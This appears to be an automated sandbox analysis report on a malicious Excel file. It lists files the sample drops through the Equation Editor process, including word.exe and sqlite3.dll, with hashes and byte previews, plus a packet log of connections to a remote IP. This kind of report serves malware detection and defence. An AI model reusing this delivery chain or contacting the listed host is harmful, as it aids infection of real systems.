                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3380000[1].zip

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):566647
                                                                          Entropy (8bit):7.998937651445336
                                                                          Encrypted:true
                                                                          SSDEEP:12288:YdF1iYiigTkuYEbb4WR54x2Si2Mxmo9fjchdiASRjVt0sNBqpKQx:YdGYii0bbKxe2MzfjxASl0EqoQx
                                                                          MD5:5E2D04CB2FAE4E811CA35675C472F5FC
                                                                          SHA1:6E2359F8E81F1A1122D1FB50B064878F2AAEFC68
                                                                          SHA-256:DD46A298AB90CA9BA8A1F633F20ABE2DCB805596B5AA68DCB84CCE99E3A56BE1
                                                                          SHA-512:53C8701768EE4A43A6B2095AF00AA5F2C53445021A91D3567D02CF8157C7B7C4E629C5C70BB24697D365A7C41C791AF0C68B511AB3CF5F356D9D929618421D05
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:PK..........WT................sqlite3.defUT....7.b.7.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#...*.[.4l....#.....j....?...../..a|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw2...U);.AV.%w.kC$../.".(3`.8....A..0.}dk..n.....i6..n....Pd.Lz&....}_...zY,r{......'48.t./...A..u.?j.y...^..9.c.O...hI`.z.......(...A ...b8....iLM'ZC...VJ$.~....&C.a..?.;j..C....1H.....n........}......[KI.)9.d6..6..F?D..R..(..&....Q.2.;....w&...!:}...A$.5..=...d....a.^K.[l...C.Dd..<.#...$.{...........?.P,.!...

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe

                                                                          Download File
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1320269
                                                                          Entropy (8bit):7.508333305248267
                                                                          Encrypted:false
                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QLQxkO/ur7UdTR49zWzYFiB/XVRK5CFPWr:f3v+7/5QL4kmu/URkzeqa/l4Ca
                                                                          MD5:A6BF416D4380AEA9DAF376E06878F0F7
                                                                          SHA1:3811D4CDD2723B0744303D7E13AE184CAF9ADEDD
                                                                          SHA-256:8B7DA48C591F5FF86724C1E89E883F95ED3E429C3FD39B270EA6D95155B9AC1B
                                                                          SHA-512:08417513747F2821DD7F458CE9E61169DAE29D0155EBF014FAF2E0C4AC76A081293AD5A3B3B11BC7426F1153E6FDEFDB12A682CF40821880BB0F7930AA0B7746
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\02ld_.zip

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):566647
                                                                          Entropy (8bit):7.998937651445336
                                                                          Encrypted:true
                                                                          SSDEEP:12288:YdF1iYiigTkuYEbb4WR54x2Si2Mxmo9fjchdiASRjVt0sNBqpKQx:YdGYii0bbKxe2MzfjxASl0EqoQx
                                                                          MD5:5E2D04CB2FAE4E811CA35675C472F5FC
                                                                          SHA1:6E2359F8E81F1A1122D1FB50B064878F2AAEFC68
                                                                          SHA-256:DD46A298AB90CA9BA8A1F633F20ABE2DCB805596B5AA68DCB84CCE99E3A56BE1
                                                                          SHA-512:53C8701768EE4A43A6B2095AF00AA5F2C53445021A91D3567D02CF8157C7B7C4E629C5C70BB24697D365A7C41C791AF0C68B511AB3CF5F356D9D929618421D05
                                                                          Malicious:false
                                                                          Preview:PK..........WT................sqlite3.defUT....7.b.7.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#...*.[.4l....#.....j....?...../..a|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw2...U);.AV.%w.kC$../.".(3`.8....A..0.}dk..n.....i6..n....Pd.Lz&....}_...zY,r{......'48.t./...A..u.?j.y...^..9.c.O...hI`.z.......(...A ...b8....iLM'ZC...VJ$.~....&C.a..?.;j..C....1H.....n........}......[KI.)9.d6..6..F?D..R..(..&....Q.2.;....w&...!:}...A$.5..=...d....a.^K.[l...C.Dd..<.#...$.{...........?.P,.!...

                                                                          C:\Users\user\AppData\Local\Temp\7yj1259-

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                          Category:dropped
                                                                          Size (bytes):77824
                                                                          Entropy (8bit):1.133993246026424
                                                                          Encrypted:false
                                                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\indivisibility

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\word.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):287744
                                                                          Entropy (8bit):7.992991490644983
                                                                          Encrypted:true
                                                                          SSDEEP:6144:RjLrn0zC2aY7/LeOqqs9MzQFM3+jYxn7F43p2tJBO:RjLrn0zCvYO/qkbtYNF4IJ4
                                                                          MD5:376ABA9FE07564E445CC3CAFB0B4D7E0
                                                                          SHA1:0DBF398D4A54DBDD8F43F81CE71F6815F29EFA99
                                                                          SHA-256:2BE36FDF91F7C66749EB1F3F08209ED177E58AA3E9A9757CA139A624B031AB4E
                                                                          SHA-512:D8245CEAE9726C9EDC1154175A06BD4AD009DAF74B539522D107D06AF3C7CE2A6A93249AF0DD91D1B160C9B5F405E1248DDD9B42FDB7D8A117262A67F1A5DD1F
                                                                          Malicious:false
                                                                          Preview:|h...S0D3..0.....0G..l:9..3S0D3QVD912NE3S0D3QVD912NE3S0D.QVD7..@E.Z.e.P...eZ'6.#B+T#7).RS +\'.&Vq$1W.[ ew.cd^>2!.<?Da3S0D3QV=88.s%T..$T.k$^.(...iP#.K....R).)....11.kXQ&xS4.D3QVD912..3S|E2Q.3xj2NE3S0D3.VF8:3EE3.4D3QVD912NE'S0D#QVDI52NEsS0T3QVF914NE3S0D3WVD912NE3#4D3SVD912NG3..D3AVD)12NE#S0T3QVD91"NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NkG6H03QV@h52NU3S0.7QVT912NE3S0D3QVD9.2N%3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD912NE3S0D3QVD

                                                                          C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):7366
                                                                          Entropy (8bit):4.351996663263546
                                                                          Encrypted:false
                                                                          SSDEEP:96:kCcuN/mXU+anR+7GgbXgXdMcAM3K4tGvAF+GEhwIEVtvaENwzY0aR:kA/B+7GgbQbKWrF+GEeJvaENwzcR
                                                                          MD5:A199F89960429326AE36F645FFC387AF
                                                                          SHA1:85E4281D0F95AA75611F2946FB4212A70F7E7B75
                                                                          SHA-256:35C648FA355503C4B6608C4D482BF8C0AE34AF33D70F08172ECD43816AAAB733
                                                                          SHA-512:48862ACDCFBA121EB52E903671731E010912CBD4B2B6F45D0E16F7E6A3BA77862695969AC7856801605689466BC7AD2E8960F227AECFF3FCE0106B4C999FBC9B
                                                                          Malicious:false
                                                                          Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_autovacuum_pages.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3changegroup_add.sqlite3changegroup_add_strm.sqlite3changegroup_delete.sqlite3changegroup_new.sqlite3changegroup_output.sqlite3changegroup_output_strm.sqlite3_changes.sqlite3_changes64.sqlite3changeset_apply.sqlite3changeset_apply_strm.sqlite3change

                                                                          C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1098199
                                                                          Entropy (8bit):6.505076426522055
                                                                          Encrypted:false
                                                                          SSDEEP:24576:chlbC7QSGIt3dr8mVpn1MRRlnCSLvcdLpi:cnZoNrLn1M3lnV4E
                                                                          MD5:F1E5F58F9EB43ECEC773ACBDB410B888
                                                                          SHA1:F1B8076B0BBDE696694BBC0AB259A77893839464
                                                                          SHA-256:A15FD84EE61B54C92BB099DFB78226548F43D550C67FB6ADF4CCE3D064AB1C14
                                                                          SHA-512:0AFF96430DD99BB227285FEFC258014C301F85216C84E40F45702D26CDD7E77261A41FD3811D686F5FB2EE363CC651A014E8FFA339384004CECE645A36486456
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: IND24072113_1.xlsx, Detection: malicious, Browse
                                                                          • Filename: ORDER_23CA0604.xls, Detection: malicious, Browse
                                                                          • Filename: ref_62334_DUBIA_RE_Order_Request_-_1712.xls, Detection: malicious, Browse
                                                                          • Filename: OrderP.O_R477304.xls, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Exploit.CVE-2018-0798.4.23192.12875.rtf, Detection: malicious, Browse
                                                                          • Filename: 220062.xls, Detection: malicious, Browse
                                                                          • Filename: P.O 10102022.xlsx, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7.b.r.........!......................... .....a................................l......... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...C...P...D...8..............@.`@.bss....(.............................`..edata..n*.......,...|..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............"..............@.0B/70.....#...............

                                                                          C:\Users\user\AppData\Roaming\word.exe

                                                                          Download File
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1320269
                                                                          Entropy (8bit):7.508333305248267
                                                                          Encrypted:false
                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QLQxkO/ur7UdTR49zWzYFiB/XVRK5CFPWr:f3v+7/5QL4kmu/URkzeqa/l4Ca
                                                                          MD5:A6BF416D4380AEA9DAF376E06878F0F7
                                                                          SHA1:3811D4CDD2723B0744303D7E13AE184CAF9ADEDD
                                                                          SHA-256:8B7DA48C591F5FF86724C1E89E883F95ED3E429C3FD39B270EA6D95155B9AC1B
                                                                          SHA-512:08417513747F2821DD7F458CE9E61169DAE29D0155EBF014FAF2E0C4AC76A081293AD5A3B3B11BC7426F1153E6FDEFDB12A682CF40821880BB0F7930AA0B7746
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\Desktop\~$IND24072113.xlsx

                                                                          Download File
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):165
                                                                          Entropy (8bit):1.4377382811115937
                                                                          Encrypted:false
                                                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                          Malicious:true
                                                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                          Static File Info

                                                                          General

                                                                          File type:Microsoft Excel 2007+
                                                                          Entropy (8bit):7.9983803277408425
                                                                          TrID:
                                                                          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                                                          • ZIP compressed archive (8000/1) 18.60%
                                                                          File name:IND24072113.xlsx
                                                                          File size:1'431'575 bytes
                                                                          MD5:22d0a21eddbb4653bd17a2661616c83d
                                                                          SHA1:2e63451d91b759c83f5ade2a461a8db913d9a06d
                                                                          SHA256:7aa5dd9473b19ca966efa3964d26773ea6d5c479debffd5d9233b16b05324d67
                                                                          SHA512:ee3942dfd3fd551cb393c38017bf3d7c5bc5921ad7cccda9798b2d239d198c1f36ed8b5a1bc0fe5beb4fc3bb0be8769f0bba327eeca6125cfe615da538b2872f
                                                                          SSDEEP:24576:RylCurmCuftwBVc38knlrn3I7Zg3bxbtVjeYphob7nQRcT:Rp66au8knpmm3bdfphJi
                                                                          TLSH:B66533ECFD03C4FE2F306A599556949AFBFAE6D9C84E0E6C3018D641EE125AC4750B8C
                                                                          File Content Preview:PK.........0VY_yIS....f.......[Content_Types].xmlUT....@.g.@.g.@.g.UKK.1.....%W..U...R..UP/......&!3...;........lX..1..1.\6.X@B.|%.e_..u0.O+..x.;....F....+@qyqx0|\E....+1#..R..A....<.LBj..o....\MA....R.O..G.C\...@...{..V5.#.N....;(.O.Wk`.....Y.....7?T{a2.

                                                                          File Icon

                                                                          Icon Hash:2562ab89a7b7bfbf

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OpenXML
                                                                          Number of OLE Files:1

                                                                          OLE File "IND24072113.xlsx"

                                                                          Indicators
                                                                          Has Summary Info:
                                                                          Application Name:
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:False
                                                                          Flash Objects Count:0
                                                                          Contains VBA Macros:False
                                                                          Summary
                                                                          Author:ctrl
                                                                          Last Saved By:ctrl
                                                                          Create Time:2022-11-18T02:05:27Z
                                                                          Last Saved Time:2022-11-18T02:07:12Z
                                                                          Creating Application:Microsoft Excel
                                                                          Security:0
                                                                          Document Summary
                                                                          Thumbnail Scaling Desired:false
                                                                          Contains Dirty Links:false
                                                                          Shared Document:false
                                                                          Changed Hyperlinks:false
                                                                          Application Version:12.0000

                                                                          Streams

                                                                          Stream Path: \x1OlE10NaTivE, File Type: data, Stream Size: 1637039
                                                                          General
                                                                          Stream Path:\x1OlE10NaTivE
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:1637039
                                                                          Entropy:7.5109847962190495
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . / ' v . . 9 < U F 1 . O . 2 U . k . . I . . . . D . 1 . 5 M . . K @ . a 4 . c F H ] . . . } . . 2 . < ) . O . ` q " . ? . . . . E . ; . W > = K ` . 5 [ % . . # p r . . } N . x . U ~ _ . . 2 . y ) . = . s Z / ' ~ . Q B i 2 + . W . & P " z . g < P v ! R . E Q . ' t h ! 0 ^ . X X Z . C , . > e m 9 S S i 9 K 4 5 $ _ J # . . . | + L = : J x 1 i . R . { Z H ( . j = ^ - ~ Q . N . . ] " . > f . . J Q C ( . r w ^ . l l [ . q . E r . ` . ? . + y 2 : " . B . . ] W . 9 h 9 n g V < G . [ \\ . a O I . B . .
                                                                          Data Raw:1a 1d 2e 04 02 2f a7 ed 27 76 01 08 96 e4 b9 fe bf ed 39 81 e1 3c bd 55 46 8b 31 8b 2e ba 4f 98 b9 ff f7 d2 8b 32 55 ff d6 05 6b 0d 1b 49 05 ea 06 f1 b6 ff e0 fd e1 9f 85 09 ce d4 44 00 31 7f 35 4d 1b 10 4b 40 07 9c cf fb 61 34 f3 8a 03 ae 63 46 98 48 bc 5d e7 ba a7 c2 a4 dd 09 b9 b7 7d 1e 20 e1 0d b5 90 da 32 b7 99 04 3c 29 04 b3 de e8 fc bf fa 4f a7 dd af f6 bb c2 ef cb eb 60 71
                                                                          Stream Path: SUXanMZqHIlXc, File Type: empty, Stream Size: 0
                                                                          General
                                                                          Stream Path:SUXanMZqHIlXc
                                                                          CLSID:
                                                                          File Type:empty
                                                                          Stream Size:0
                                                                          Entropy:0.0
                                                                          Base64 Encoded:False
                                                                          Data ASCII:
                                                                          Data Raw:

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 22, 2024 15:00:45.816514015 CEST4916180192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:45.821901083 CEST8049161192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:45.821958065 CEST4916180192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:45.822179079 CEST4916180192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:45.827456951 CEST8049161192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:46.517280102 CEST8049161192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:46.517349005 CEST4916180192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:46.540774107 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:46.540823936 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:46.540889025 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:46.553548098 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:46.553569078 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:47.964407921 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:47.964595079 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:47.970222950 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:47.970249891 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:47.970555067 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:47.970633030 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.040294886 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.083337069 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.281316996 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.281366110 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.281383991 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.281397104 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.281408072 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.281416893 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.281435966 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.281443119 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.281465054 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.281478882 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.287399054 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.353940964 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.353990078 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.354065895 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.354095936 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.354110003 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.354136944 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.354290962 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.398500919 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.398561954 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.398619890 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.398642063 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.398657084 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.398679972 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.398798943 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.469579935 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.469638109 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.469683886 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.469705105 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.469716072 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.469743013 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.469890118 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.471402884 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.471443892 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.471468925 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.471478939 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.471492052 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.471524954 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.472349882 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.473258972 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.473304033 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.473326921 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.473335981 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.473361015 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.473382950 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.473800898 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.516482115 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.516547918 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.516577959 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.516596079 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.516608000 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.516642094 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.516751051 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.586138010 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.586188078 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.586257935 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.586277008 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.586297989 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.586317062 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.586889029 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.586945057 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.586946011 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.586956978 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.586997032 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.588284969 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.588326931 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.588351011 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.588361979 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.588396072 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.588403940 CEST49162443192.168.2.22192.3.255.145
                                                                          Oct 22, 2024 15:00:48.589307070 CEST44349162192.3.255.145192.168.2.22
                                                                          Oct 22, 2024 15:00:48.589345932 CEST44349162192.3.255.145192.168.2.22
